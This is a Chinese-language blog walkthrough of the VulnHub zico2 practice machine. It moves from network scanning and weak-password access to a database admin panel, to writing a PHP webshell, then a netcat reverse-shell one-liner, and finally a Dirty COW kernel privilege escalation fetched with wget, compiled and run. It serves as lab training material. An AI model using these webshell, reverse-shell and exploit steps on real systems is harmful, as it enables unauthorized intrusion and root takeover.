vulnhub zico2

总结:脏牛提权

目录

下载地址

漏洞分析

信息收集

木马上传

反弹shell

提权



下载地址

使用方法:这里下载过来以后使用vm直接打开ova就可以了。


漏洞分析

信息收集

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24  使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下,对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注:ip段要看自己的

这里扫出来有这些端口,这里去看看80端口的网站

像这种总感觉是一个像一种框架,这里去扫一扫他的目录。

居然还有README.md,果然是直接拿过来用的,框架,经过我一遍遍,查看感觉只有dbadmin中有漏洞。

点击这个,然后直接弱口令admin直接就进去了。

 

木马上传

这里进来点击info就可以看到密码了。

这里感觉是像md5的,这里看看长度,应该就是md5加密,这里找一个md5解密网站看看

MD5免费在线解密破解_MD5在线加密-SOMD5

都解出来了

root:34kroot34

zico:zico2215@

但是吧,这里都登不进去。

 

然后想想我们可以写马,这里新建一个库,然后我们新建一个表,然后写里面的内容。

然后注意这里,我们修改他的位置,这里/usr/databases/是他的绝对路径,所以在dbadmin是绝对访问不到的,所以我们修改成相对路径。

这里点击aa.php,没问题的话,直接使用蚁剑连接。

 这里直接就连上来。

反弹shell

这里不知道为什么截图蚁剑,这个就会变的这么白,回归正题,这里点击虚拟终端。

//经过尝试这个命令可以反弹shell回来,注意使用自己的ip和监听的端口
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.198 333 >/tmp/f

提权

这里我们看看内核版本号,这里issue文件中没有什么东西。

这里我们使用searchsploit去看看有没有什么好用的东西。

这里我们复制到桌面上来,顺便使用python搞一个临时网站

但是这个提权,我尝试了没有成功,这里就不多尝试了

这里还是祭出搜索引擎来看看 ,哦~,居然这个也可以使用脏牛。

//自己可以在靶机中试试,可以的话,就直接到编译哪一步
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
 
//使用Python开启临时网站
python3 -m http.server
 
//靶机下载本机的dirty.c过来
//注意要看自己的ip
wget http://192.168.31.120:8000/dirty.c
 
//编译
gcc -pthread dirty.c -lcrypt -o dirty
 
//给权限
chmod +x dirty
 
//执行
./dirty

注意执行以后他就会叫我们输入密码,这里看自己,出现下面那个用户就可以了

这里我的就是firefart:1

 直接另开窗口ssh连接,这里我们看到我们也是root权限了。

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值